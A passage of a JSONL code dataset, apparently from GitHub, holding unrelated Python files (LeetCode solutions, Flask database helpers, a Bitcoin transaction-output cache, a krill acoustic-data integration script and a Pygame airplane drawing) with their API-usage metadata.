35, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 35, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 36, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 36, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 37, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 37, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 38, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 38, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 40, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 40, "usage_type": "attribute"}, {"api_name": "streamlit.dataframe", "line_number": 41, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 42, "usage_type": "call"}, {"api_name": "plotly.express.area", "line_number": 46, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 46, "usage_type": "name"}, {"api_name": "plotly.express.scatter", "line_number": 47, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 47, "usage_type": "name"}, {"api_name": "plotly.express.bar", "line_number": 48, "usage_type": "call"}, {"api_name": 
"plotly.express", "line_number": 48, "usage_type": "name"}, {"api_name": "plotly.express.box", "line_number": 49, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 49, "usage_type": "name"}, {"api_name": "streamlit.checkbox", "line_number": 50, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 51, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 52, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 53, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 54, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 55, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 56, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 57, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 59, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 59, "usage_type": "name"}, {"api_name": "streamlit.checkbox", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 61, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 63, "usage_type": "call"}, {"api_name": "plotly.express.sunburst", "line_number": 64, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 64, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 65, "usage_type": "call"}, {"api_name": "plotly.express.sunburst", "line_number": 66, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 66, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 67, "usage_type": "call"}, {"api_name": "plotly.express.treemap", "line_number": 68, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 68, "usage_type": "name"}, {"api_name": "plotly.express.bar", "line_number": 69, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 69, "usage_type": "name"}, {"api_name": "streamlit.checkbox", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 71, "usage_type": "call"}, {"api_name": "plotly.express.histogram", "line_number": 72, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 72, "usage_type": "name"}, {"api_name": "plotly.express.histogram", "line_number": 73, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 73, "usage_type": "name"}, {"api_name": "streamlit.checkbox", "line_number": 74, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 75, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 76, "usage_type": "call"}, {"api_name": "plotly.express.violin", "line_number": 77, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 77, "usage_type": "name"}, {"api_name": "plotly.express.violin", "line_number": 78, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 78, "usage_type": "name"}, {"api_name": "streamlit.checkbox", "line_number": 79, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 80, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "5868672374", "text": "from collections import deque\n\n\nclass MovingAverage:\n\n def __init__(self, size: int):\n self.q = deque()\n self.s = size\n\n def next(self, val: int) -> float:\n if len(self.q) >= self.s:\n self.q.pop()\n self.q.appendleft(val)\n return sum(self.q) / 
len(self.q)\n\n# Your MovingAverage object will be instantiated and called as such:\n# obj = MovingAverage(size)\n# param_1 = obj.next(val)", "repo_name": "vramanrs/Leetcode-python", "sub_path": "moving-average-from-data-stream.py", "file_name": "moving-average-from-data-stream.py", "file_ext": "py", "file_size_in_byte": 430, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "70418661635", "text": "\"\"\"\nCollection of all business logic the application must be able to\nperform.\n\"\"\"\nfrom contextlib import contextmanager\nfrom sqlalchemy.exc import IntegrityError\nfrom database import Session\nfrom models import User\n\n\n@contextmanager\ndef session_scope():\n    \"\"\"\n    Context for dealing with sessions. This allows the developer not to have to\n    worry per se about closing and creating the session.\n    \"\"\"\n    session = Session()\n    try:\n        yield session\n        session.commit()\n    except:\n        session.rollback()\n        raise\n    finally:\n        session.close()\n\n\ndef name_registered(name):\n    \"\"\"\n    Confirm or deny the uniqueness of the given user in the database.\n    \"\"\"\n    with session_scope() as session:\n        if session.query(User).filter(User.name == name).one_or_none():\n            return True\n    return False\n\n\ndef email_registered(email):\n    \"\"\"\n    Confirm or deny the uniqueness of the given email in the database.\n    \"\"\"\n    with session_scope() as session:\n        if session.query(User).filter(User.email == email).one_or_none():\n            return True\n    return False\n\n\ndef register_user(name, email):\n    \"\"\"\n    Register a user in the database by a name and email.\n    \"\"\"\n    with session_scope() as session:\n        new_user = User(name, email)\n        session.add(new_user)\n        try:\n            session.commit()\n        except IntegrityError:\n            session.rollback()\n            raise\n        else:\n            return new_user.id\n    ", "repo_name": "Drvanon/FlaskBoilerplate", "sub_path": "controllers.py", "file_name": "controllers.py", "file_ext": "py", "file_size_in_byte": 1499, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "database.Session", "line_number": 17, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 11, "usage_type": "name"}, {"api_name": "models.User", "line_number": 33, "usage_type": "argument"}, {"api_name": "models.User.name", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 43, "usage_type": "argument"}, {"api_name": "models.User.email", "line_number": 43, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 53, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.IntegrityError", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "14958532073", "text": "\"\"\"\nA chef has collected data on the satisfaction level of his n dishes. Chef can cook any dish in 1 unit of time.\n\nLike-time coefficient of a dish is defined as the time taken to cook that dish including previous dishes multiplied\nby its satisfaction level i.e. 
time[i] * satisfaction[i].\n\nReturn the maximum sum of like-time coefficient that the chef can obtain after dishes preparation.\n\nDishes can be prepared in any order and the chef can discard some dishes to get this maximum value.\n\n\n\nExample 1:\n\nInput: satisfaction = [-1,-8,0,5,-9] Output: 14 Explanation: After Removing the second and last dish, the maximum\ntotal like-time coefficient will be equal to (-1*1 + 0*2 + 5*3 = 14). Each dish is prepared in one unit of time.\nExample 2:\n\nInput: satisfaction = [4,3,2]\nOutput: 20\nExplanation: Dishes can be prepared in any order, (2*1 + 3*2 + 4*3 = 20)\nExample 3:\n\nInput: satisfaction = [-1,-4,-5]\nOutput: 0\nExplanation: People do not like the dishes. No dish is prepared.\n\n\nConstraints:\n\nn == satisfaction.length\n1 <= n <= 500\n-1000 <= satisfaction[i] <= 1000\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n    def maxSatisfaction(self, satisfaction: List[int]) -> int:\n        # Like-time coefficient of a dish is defined as the time taken to cook that dish including previous dishes\n        # multiplied by its satisfaction level i.e. time[i] * satisfaction[i].\n\n        max_satisfaction = sorted(satisfaction, reverse=True)\n\n        # result -> sum of time to cook the positive reviewed dish [Note: +ve -> positive like time to cook same dish\n        # considering previous time to cook the previous dish]\n        # like time -> it is like time coefficient of the dish prepared by chef in a day[given satisfaction array]\n        result, like_time = 0, 0\n\n        # loop throughout dish time in list.\n        for dish_time in max_satisfaction:\n\n            # like time -> if positive, add time to like time coefficient to given dish time\n            like_time += dish_time\n\n            # like time -> if negative, then there is no need of consideration\n            if like_time < 0:\n                break\n\n            # result -> add result to like time coefficient\n            result += like_time\n\n        return result\n\n\nsolution = Solution()\nassert 14 == solution.maxSatisfaction(satisfaction=[-1, -8, 0, 5, -9])\nassert 20 == solution.maxSatisfaction(satisfaction=[4, 3, 2])\nassert 0 == solution.maxSatisfaction(satisfaction=[-1, -4, -5])\n", "repo_name": "ImSakunthala/leetcode", "sub_path": "Advance_level/reducing_dishes.py", "file_name": "reducing_dishes.py", "file_ext": "py", "file_size_in_byte": 2450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "35825932627", "text": "from collections import OrderedDict\nimport logging\n\nfrom bitcoin.core import str_money_value, b2lx, b2x, x\nfrom bitcoin.wallet import CBitcoinAddress, CBitcoinAddressError\nfrom bitcoin.rpc import unhexlify, hexlify\nfrom bitcoin.core import COutPoint\n\nfrom .exceptions import ChainError, BacktrackError\nlogger = logging.getLogger(__name__)\nCOINBASE_TX = b'\\x00'*32\n\ndef bitcoin_to_string(value):\n    \"\"\"Convert bitcoin value to a string\"\"\"\n    #TODO: Append zeroes up to standard length\n    bitcoin_str = str_money_value(abs(value))\n    if value < 0:\n        return '- '+bitcoin_str\n    else:\n        return bitcoin_str\n\n\n\nclass TxOut(object):\n    \"\"\"Transaction output\"\"\"\n    __slots__ = ('tx', 'nout', 'addr', 'value')\n\n    def __init__(self, tx, nout, addr=None, value=0):\n        \"\"\"\n        Arguments:\n            tx (string): Transaction hash\n            nout (int): Transaction output number\n            addr (string):\n            value (int): Output value\n        \"\"\"\n        self.tx = tx\n        self.nout = nout\n        self.addr = addr\n        self.value = value\n\n    @staticmethod\n    def addr_from_script(script):\n        \"\"\"Generate output address from scriptPubKey\"\"\"\n        
try:\n            addr = str(CBitcoinAddress.from_scriptPubKey(script))\n        except CBitcoinAddressError:\n            addr = None\n        \n        return addr\n\n    @classmethod\n    def from_tx(cls, tx, nout):\n        \"\"\"\n        WARNING: This is not efficient to process all the transaction outputs\n        because of GetTxid() does not cache the result.\n\n        Arguments:\n            tx (bitcoin.CTransaction): Transaction\n            nout (int): Output number\n\n        Returns:\n            Initialized TxOut\n\n        Exceptions:\n            CBitcoinAddressError: Couldn't convert transaction output scriptPubKey \n                to address\n            IndexError: The requested output doesn't exist\n        \"\"\"\n        # GetTxid instead of GetHash for segwit support (bip-0141)\n        txhash = tx.GetTxid()\n        cout = tx.vout[nout]\n        addr = TxOut.addr_from_script(cout.scriptPubKey)\n        return cls(txhash, nout, addr, value=cout.nValue)\n\n    def __hash__(self):\n        return hash((self.tx, self.nout))\n\n    def __eq__(self, other):\n        if not isinstance(other, type(self)):\n            return False\n        return self.tx == other.tx and self.nout == other.nout\n    \n    def __repr__(self):\n        return \"TxOut({}, {}, {}, {})\".format(\n            self.tx, \n            self.nout, \n            self.addr, \n            self.value)\n\n    def __str__(self): \n        return \"TxOut({}, {}, {}, {})\".format(\n            b2x(self.tx), \n            self.nout, \n            self.addr, \n            str_money_value(self.value))\n\n\n\nclass Block(object):\n\n    __slots__=('block_hash', 'height', 'vin', 'vout')\n\n    def __init__(self, block_hash, height, vin=None, vout=None):\n        \n        self.block_hash = block_hash\n        self.height = height\n        if not vin:\n            vin = []\n        if not vout:\n            vout = []\n\n        self.vin = list(vin)\n        self.vout = list(vout)\n\n    def __hash__(self):\n        return hash(self.block_hash)\n\n    def __eq__(self, other):\n        if isinstance(other, self.__class__):\n            return self.block_hash==other.block_hash\n        else:\n            return False\n\n    def __repr__(self):\n        return \"{}({},{},{},{})\".format(self.__class__.__name__,\n                                        self.block_hash,\n                                        self.height,\n                                        self.vin,\n                                        self.vout)\n\n    def __str__(self):\n        return \"{}: {} ({})\".format(self.__class__.__name__,\n                                    self.block_hash,\n                                    self.height)\n\n    def check_balance(self):\n        \"\"\"Check block input value sum is equal to output value sum\"\"\"\n        input_value=0\n        output_value=0\n\n        for vin in self.vin:\n            input_value += vin.value\n\n        for vout in self.vout:\n            output_value += vout.value\n\n        return input_value == output_value\n\n\nclass TxOutCache(object):\n    \n    def __init__(self, proxy, size=500000):\n        \"\"\"\n        Arguments:\n            size (int): max cache size\n            proxy (proxy.BitcoindProxy)\n        \"\"\"\n        self._proxy = proxy\n        self._max_size = size\n\n        self._txout_cache = OrderedDict()\n\n        self._cache_miss = 0\n        self._cache_hit = 0\n\n    def del_txout(self, txout):\n        \"\"\"Remove txout from cache\"\"\"\n        self._txout_cache.pop(txout, None)\n    \n    def add_txout(self, txout):\n        \"\"\"Add TxOut to cache\"\"\"\n        if len(self._txout_cache)>=self._max_size:\n            self._txout_cache.popitem(last=False)\n        \n        self._txout_cache[txout] = txout\n\n    def purge_cache(self):\n        \"\"\"Purge complete cache\"\"\"\n        self._txout_cache = OrderedDict()\n\n    def get_txout(self, txhash, nout):\n        \"\"\"\n        Get TxOut from cache or if not available query bitcoind_proxy\n        \n        Arguments:\n            txhash (str): Transaction hash\n            nout (int): Output number\n        \"\"\"\n        try:\n            txout = self._txout_cache[TxOut(txhash, nout)]\n            self._cache_hit += 1\n            return txout\n        except KeyError:\n            pass\n\n        self._cache_miss += 1\n\n        with self._proxy as proxy: \n            try:\n                tx = proxy.get_transaction(txhash)\n            except ConnectionError:\n                raise\n            except Exception:\n                raise ChainError(\"Unknown Txout {} {}\".format(txhash, nout))\n            \n            # Manually initialize TxOut so 
there is no need to generate the transaction\n            # hash a second time. (faster than: txout = TxOut.from_tx(rawtx, nout))\n            for out, cout in enumerate(tx.vout):\n                addr = TxOut.addr_from_script(cout.scriptPubKey)\n                self.add_txout(TxOut(txhash, out, addr, value=cout.nValue))\n\n            # Now txout must be in cache\n            self._cache_hit -= 1 # Fix hit/miss counter\n            return self.get_txout(txhash, nout)\n    \n\nclass BlockFactory(object):\n\n    def __init__(self, proxy, size=1000000):\n        \"\"\"\n        Arguments:\n            size (int): max cache size\n            proxy (proxy.BitcoindProxy)\n        \"\"\"\n        self._proxy = proxy\n        self._max_size = size\n        \n        self._cache = TxOutCache(proxy, size)\n\n    def purge_cache(self):\n        \"\"\"Completely purge cache\"\"\"\n        self._cache.purge_cache()\n\n    def _transaction_inputs(self, tx):\n        \"\"\"Generate transaction inputs from source transaction outputs\"\"\" \n        inputs = []\n        txhash = tx.GetTxid()\n        \n        for vin in tx.vin:\n            txin = vin.prevout\n            \n            if txin.hash == COINBASE_TX:\n                continue\n\n            txout = self._cache.get_txout(txin.hash, txin.n)\n            if txout is None:\n                logger.error(\"Unable to find TxOut {} {}\".format(\n                    txin.hash, txin.n))\n            else:\n                inputs.append(txout)\n\n        return inputs\n\n    def _transaction_outputs(self, tx):\n        \"\"\"Generate transaction TxOut\"\"\" \n        outputs = []\n\n        # GetTxid instead of GetHash for segwit support (bip-0141)\n        txhash = tx.GetTxid()\n\n        for n, utxo in enumerate(tx.vout): \n            \n            addr = TxOut.addr_from_script(utxo.scriptPubKey)\n            out = TxOut(txhash, n, addr, value=utxo.nValue)\n            outputs.append(out)\n\n        return outputs\n\n    def _block_outputs(self, block):\n        \"\"\"Generate the TxOut for all the block outputs\"\"\"\n        block_txouts = []\n\n        for tx in block.vtx:\n            block_txouts.extend(self._transaction_outputs(tx))\n        \n        return block_txouts\n\n    def _block_inputs(self, block):\n        \"\"\"Generate the TxOut for all the block inputs\"\"\"\n        block_inputs = []\n\n        for tx in block.vtx:\n            block_inputs.extend(self._transaction_inputs(tx))\n\n        return block_inputs\n\n    def build_block(self, block, height=None):\n        \"\"\"Build Block from bitcoin.CBlock\"\"\"\n        blockhash = block.GetHash()\n        \n        \n        outputs = self._block_outputs(block)\n        \n        # Add outputs to cache, because the outputs from a transaction\n        # can be used as inputs for other transactions in the same block\n        for txout in outputs:\n            if txout.value > 0:\n                self._cache.add_txout(txout)\n\n        # Generate inputs \n        inputs = self._block_inputs(block)\n        #TODO: Remove outputs added to cache if input generation fails???\n\n\n        # With the complete block remove used inputs from cache to save space\n        #for txout in inputs:\n        #    self._cache.del_txout(txout)\n\n        block = Block(blockhash, height, inputs, outputs)\n        return block\n", "repo_name": "secnot/bitcoin-balance", "sub_path": "bitbalance/primitives.py", "file_name": "primitives.py", "file_ext": "py", "file_size_in_byte": 8913, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "bitcoin.core.str_money_value", "line_number": 16, "usage_type": "call"}, {"api_name": "bitcoin.wallet.CBitcoinAddress.from_scriptPubKey", "line_number": 45, "usage_type": "call"}, {"api_name": "bitcoin.wallet.CBitcoinAddress", "line_number": 45, "usage_type": "name"}, {"api_name": "bitcoin.wallet.CBitcoinAddressError", "line_number": 46, "usage_type": "name"}, {"api_name": "bitcoin.core.b2x", "line_number": 92, "usage_type": "call"}, {"api_name": "bitcoin.core.str_money_value", "line_number": 95, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 
161, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 179, "usage_type": "call"}, {"api_name": "exceptions.ChainError", "line_number": 204, "usage_type": "call"}]} +{"seq_id": "43038497878", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\ndef final_depth_integrate(finname,foutname):\n \n #jupyter nbconvert --to script final_depth_integrate.ipynb \n # Use the above script in a Terminal Window to convert to a .py file\n\n import numpy as np\n import pandas as pd\n import matplotlib.pyplot as plt\n import statistics as st\n import time as time\n\n from IPython.core.interactiveshell import InteractiveShell\n InteractiveShell.ast_node_interactivity = \"last\"\n #other options include 'none', 'last', 'last_expr'\n\n df1=pd.read_csv(finname) \n\n df2=df1.copy(deep=True)\n df2.drop(df2[df2[' Layer']!=2].index, inplace=True)\n df2=df2.reset_index(drop=True)\n \n df1=df1.replace([-9999.0, 9999.0, -999.0, 999.0], np.nan)\n df2=df2.replace([-9999.0, 9999.0, -999.0, 999.0], np.nan)\n #df1=df1.replace(9999.0, np.nan)\n #df2=df2.replace(-9999.0, np.nan)\n #df2=df2.replace(9999.0, np.nan)\n\n df1_interval=np.nanmax(df1[' Interval'])\n df2_interval=np.nanmax(df2[' Interval'])\n mx_interval_int=int(df1_interval)\n\n #Check that the number or instances with data (# of intervals) equals the number of rows in df2\n if len(np.unique(df1[' Interval'])) != len(df2.index):\n print('Mismatch in Length of Files!!! ' +finname+ ' NOT processed') \n else: \n bad_value=-9998\n tic=time.time()\n cnt=0 #Counter is needed in case interval is not sequential in the original csv file\n for i in range (mx_interval_int+1):\n if any(df1[' Interval']==i):\n #print(i)\n loar=df1[' Interval']==i\n #idx=loar[loar==True].index[-1] #Maybe Not Needed\n #df2[' NASC'][i]=sum((df1[' NASC'])[loar]) #THis Created Warnings! 
Better to use iloc like below\n\n df2.iloc[cnt,df2.columns.get_loc(' Sv_mean')]=bad_value\n df2.iloc[cnt,df2.columns.get_loc(' NASC')]=sum((df1[' NASC'])[loar])\n\n df2.iloc[cnt,df2.columns.get_loc(' Sv_max')]=np.nanmax((df1[' Sv_max'])[loar])\n df2.iloc[cnt,df2.columns.get_loc(' Sv_min')]=np.nanmin((df1[' Sv_min'])[loar])\n df2.iloc[cnt,df2.columns.get_loc(' Sv_noise')]=bad_value\n df2.iloc[cnt,df2.columns.get_loc(' NASC_noise')]=bad_value\n\n df2.iloc[cnt,df2.columns.get_loc(' Height_mean')]=sum((df1[' Height_mean'])[loar])\n df2.iloc[cnt,df2.columns.get_loc(' Depth_mean')]=bad_value\n\n df2.iloc[cnt,df2.columns.get_loc(' Samples')]=sum((df1[' Samples'])[loar])\n\n df2.iloc[cnt,df2.columns.get_loc(' Layer_depth_max')]=np.nanmax((df1[' Layer_depth_max'])[loar])\n df2.iloc[cnt,df2.columns.get_loc(' Layer_depth_min')]=np.nanmin((df1[' Layer_depth_min'])[loar])\n\n df2.iloc[cnt,df2.columns.get_loc(' Standard_deviation')]=bad_value\n df2.iloc[cnt,df2.columns.get_loc(' Skewness')]=bad_value\n df2.iloc[cnt,df2.columns.get_loc(' Kurtosis')]=bad_value\n df2.iloc[cnt,df2.columns.get_loc(' ABC')]=sum((df1[' ABC'])[loar])\n df2.iloc[cnt,df2.columns.get_loc(' Area_Backscatter_Strength')]=bad_value\n\n df2.iloc[cnt,df2.columns.get_loc(' Thickness_mean')]=sum((df1[' Thickness_mean'])[loar])\n df2.iloc[cnt,df2.columns.get_loc(' Range_mean')]=bad_value\n df2.iloc[cnt,df2.columns.get_loc(' Beam_volume_sum')]=sum((df1[' Beam_volume_sum'])[loar])\n cnt=cnt+1\n #tmp_date=df[' Date_M'][loar]\n #f_time.append((df[' Time_M'])[loar])\n toc=time.time()\n elapsed=toc-tic\n #print(elapsed)\n \n df2=df2.fillna(value=-9999.0)\n df2\n df2.to_csv (foutname, index = False, header=True)\n print('Writing ' +foutname+ ' with ' +str(len(df2.index))+ ' rows.') \n print('Processing took ' +str(elapsed)+ ' seconds.')\n print('')\n \n #import csv\n #csvData=[f_lon, f_lat, f_nasc]\n\n #zipped=zip(f_date,f_time,f_lon, f_lat, f_nasc)\n #zipped=zip(f_time,f_lon, f_lat, f_nasc)\n\n #with open('test.csv', 'w') as csvFile:\n # writer=csv.DictWriter(csvFile, fieldnames=[\"Time\",\"Lon_M\",\"Lat_M\",\"NASC\"])\n # writer.writeheader()\n # writer = csv.writer(csvFile)\n #writer.writeheader\n # writer.writerows(zipped)\n\n #csvFile.close()\n\n #type(f_lon)\n \n\n", "repo_name": "jeffdorman/krill_biomass", "sub_path": "programs/krill_biomass_processing/final_depth_integrate.py", "file_name": "final_depth_integrate.py", "file_ext": "py", "file_size_in_byte": 4369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "IPython.core.interactiveshell.InteractiveShell.ast_node_interactivity", "line_number": 19, "usage_type": "attribute"}, {"api_name": "IPython.core.interactiveshell.InteractiveShell", "line_number": 19, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.nanmax", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 39, "usage_type": "call"}, {"api_name": "time.time", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 65, "usage_type": "call"}, {"api_name": 
"numpy.nanmin", "line_number": 66, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "15858724367", "text": "import pygame, sys, random\r\nimport numpy as np\r\n\r\nclass Main:\r\n def __init__(self, fps=60, screen_resolution=()):\r\n self.fps = fps\r\n pygame.init()\r\n self.screen = pygame.display.set_mode((1080,720))\r\n self.clock = pygame.time.Clock()\r\n self.display_width, self.display_height = pygame.display.Info().current_w, pygame.display.Info().current_h\r\n self.bool_pos = 0\r\n self.x = 5\r\n self.conter = 0\r\n #0 - Левое Крыло; 2 - Правое крыло; 1 - Основа; 3 - Заднее Левое Крыло; 4 - Заднее Правое Крыло\r\n self.list_0_coordinates = [[215, 100], [255, 100],\r\n [365, 307], [265, 310]]\r\n self.list_2_coordinates = [[215, 560], [255, 560],\r\n [365, 353], [265, 350]]\r\n self.list_3_coordinates = [[0, 250], [20, 250],\r\n [90, 330], [30, 330]]\r\n self.list_4_coordinates = [[0, 410], [20, 410],\r\n [90, 330], [30, 330]]\r\n self.list_1_coordinates = [[505, 330], [495, 345], [480, 360],\r\n [50, 345], [30, 330],\r\n [50, 315], [480, 300],[495, 315]]\r\n self.p_list = [self.list_0_coordinates, self.list_1_coordinates, self.list_2_coordinates, self.list_3_coordinates, self.list_4_coordinates]\r\n #Тут Отрисовка перед циклом\r\n\r\n def run_while(self):\r\n while True:\r\n self.conter += 1\r\n if not self.bool_pos:\r\n self.drawing_in_a_loop()\r\n self.event_handler()\r\n pygame.display.flip()\r\n self.clock.tick(self.fps)\r\n\r\n def event_handler(self):\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN :\r\n if event.key == pygame.K_ESCAPE:\r\n pygame.quit()\r\n sys.exit()\r\n elif event.key == pygame.K_SPACE:\r\n self.bool_pos = 0\r\n if event.type == pygame.MOUSEBUTTONDOWN :\r\n self.pos = event.pos\r\n for p in self.p_list:\r\n if self.point_in_polygon(p, self.pos):\r\n self.fire()\r\n self.bool_pos = not self.bool_pos\r\n break\r\n #print(self.pos)\r\n #if self.pos\r\n\r\n def drawing_in_a_loop(self):\r\n if self.list_4_coordinates[0][0] >= pygame.display.Info().current_w:\r\n self.list_0_coordinates = [[-290, 100], [-250, 100], [-140, 307], [-240, 310]]\r\n self.list_2_coordinates = [[-290, 560], [-250, 560], [-140, 353], [-240, 350]]\r\n self.list_3_coordinates = [[-505, 250], [-485, 250], [-415, 330], [-475, 330]]\r\n self.list_4_coordinates = [[-505, 410], [-485, 410], [-415, 330], [-475, 330]]\r\n self.list_1_coordinates = [[0, 330], [-10, 345], [-25, 360], [-455, 345],\r\n [-475, 330], [-455, 315], [-25, 300], [-10, 315]]\r\n self.p_list = [self.list_0_coordinates, self.list_1_coordinates, self.list_2_coordinates, self.list_3_coordinates, self.list_4_coordinates]\r\n\r\n self.screen.fill((125,249,255))\r\n for i in range(len(self.list_0_coordinates)):\r\n self.list_0_coordinates[i][0] += self.x\r\n for i in range(len(self.list_1_coordinates)):\r\n self.list_1_coordinates[i][0] += self.x\r\n for i in range(len(self.list_2_coordinates)):\r\n self.list_2_coordinates[i][0] += self.x\r\n for i in range(len(self.list_3_coordinates)):\r\n self.list_3_coordinates[i][0] += self.x\r\n for i in range(len(self.list_4_coordinates)):\r\n self.list_4_coordinates[i][0] += self.x\r\n\r\n pygame.draw.lines(self.screen, \"black\", True, self.list_0_coordinates, 5)\r\n pygame.draw.lines(self.screen, \"black\", True, self.list_2_coordinates, 5)\r\n pygame.draw.polygon(self.screen, (181,184,187), self.list_0_coordinates)\r\n 
pygame.draw.polygon(self.screen, (181,184,187), self.list_2_coordinates)\r\n pygame.draw.polygon(self.screen, (181,184,187), self.list_3_coordinates)\r\n pygame.draw.polygon(self.screen, (181,184,187), self.list_4_coordinates)\r\n pygame.draw.aalines(self.screen, \"black\", True, self.list_3_coordinates, 5)\r\n pygame.draw.aalines(self.screen, \"black\", True, self.list_4_coordinates, 5)\r\n pygame.draw.polygon(self.screen, (181,184,187), self.list_1_coordinates)\r\n pygame.draw.aalines(self.screen, \"black\", True, self.list_1_coordinates, 5)\r\n\r\n def point_in_polygon(self, p, point):\r\n result = False\r\n size = len(p)\r\n j = size - 1\r\n for i in range(size):\r\n if (p[i][1] < point[1] and p[j][1] >= point[1] or p[j][1] < point[1]\r\n and p[i][1] >= point[1]) and (p[i][0] + (point[1] - p[i][1]) / (p[j][1] - p[i][1]) * (p[j][0] - p[i][0]) < point[0]):\r\n result = not result\r\n j = i\r\n return result\r\n\r\n def fire(self):\r\n pygame.draw.circle(self.screen, \"red\", self.pos, 3)\r\n pygame.draw.circle(self.screen, \"red\", self.pos, 7, 1)\r\n pygame.draw.circle(self.screen, \"red\", self.pos, 9, 1)\r\n\r\nMain(24).run_while()\r\n", "repo_name": "fevzifevziev/Computer_Graphics", "sub_path": "lab_5/5.02.py", "file_name": "5.02.py", "file_ext": "py", "file_size_in_byte": 5480, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.display.Info", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 35, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 45, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.K_SPACE", "line_number": 47, 